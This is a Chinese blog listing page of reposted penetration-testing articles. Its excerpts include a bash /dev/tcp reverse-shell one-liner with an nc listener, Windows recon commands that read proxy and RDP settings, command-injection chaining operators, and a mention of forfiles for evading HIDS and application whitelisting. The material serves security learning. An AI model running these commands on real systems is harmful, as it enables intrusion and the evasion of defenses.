知识
文章平均质量分 74
cainsoftware
这个作者很懒,什么都没留下…
展开
-
CTF常见加密方式JS
一、密码学基本简介密码学(在西欧语文中,源于希腊语kryptós“隐藏的”,和gráphein“书写”)是研究如何隐密地传递信息的学科。在现代特别指对信息以及其传输的数学性研究,常被认为是数学和计算机科学的分支,和信息论也密切相关。著名的密码学者Ron Rivest解释道:“密码学是关于如何在敌人存在的环境中通讯”,自工程学的角度,这相当于密码学与纯数学的异同。密码学是信息安全等相关议题,如认证、访问控制的核心。密码学的首要目的是隐藏信息的涵义,并不是隐藏信息的存在。密码学也促进了计算机转载 2021-10-09 14:02:09 · 2274 阅读 · 0 评论 -
反弹shell的N种姿势
0x00 前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一转载 2021-10-09 13:36:50 · 260 阅读 · 0 评论 -
内网信息收集总结
前言本文记录一些内网渗透的注意点,信息比较散乱,后续更新完善本机信息查询:常用信息本机服务列表wmic service list brief本机进程列表Tasklist /v浏览器代理信息reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"RDP端口号(16进制)reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet原创 2021-10-09 13:30:27 · 420 阅读 · 0 评论 -
命令注入绕过方式总结
前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。cmd1;cmd2管道符(|)cmd1命令的输出,作为下一条命令cmd2的参数。cmd1|cmd2and(&&)与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2cmd1 && cmd2转载 2021-10-09 11:35:22 · 1685 阅读 · 0 评论 -
常见WAF拦截页面总结
(1) D盾(2) 云锁(3) UPUPW安全防护(4) 宝塔网站防火墙(5) 网防G01(6) 护卫神(7) 网站安全狗(8) 智创防火墙(9) 360主机卫士或360webscan(10) 西数WTS-WAF(11) Naxsi WAF(12) 腾讯云(13) 腾讯宙斯盾(14) 百度云(15) 华为云(16) 网宿云...转载 2021-10-09 11:00:09 · 1789 阅读 · 0 评论 -
Linux入侵应急响应与排查
入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统, 而创建系统账号是一种比较常见的后门方式。查询特权用户特权用户(uid 为0)awk -F: '$3==0{print $1}' /etc/passwd查找远程可以登录的账户awk '/\$1|\$5|\$6/{print $1}' /etc/shadow $1:MD5(长度 22个字符) $5:SHA-256(长度 43 个字符) $6:SHA-512(长度86 个字符) 检查sudo权限转载 2021-10-09 10:40:57 · 147 阅读 · 0 评论 -
Windows 系统下实现间接命令执行
0x00 前言最近学习看到了关于Windows系统下实现间接命令执行的文章。某些情况下,可以使用非cmd.exe的一些自带的程序文件来执行命令,常见的场景就是逃避检测,绕过一些HIDS,看到国外的文章讲的是可以绕过应用程序白名单产品。具体可利用于哪些场景还得靠表哥们研究下。这里直接就用找到的一些例子来测试下。0x01 操作1.forfilesforfiles是一款windows平台的软件工具,其中选择文件并运行一个命令来操作文件。实际需要执行的命令是通...转载 2021-10-09 09:34:53 · 926 阅读 · 0 评论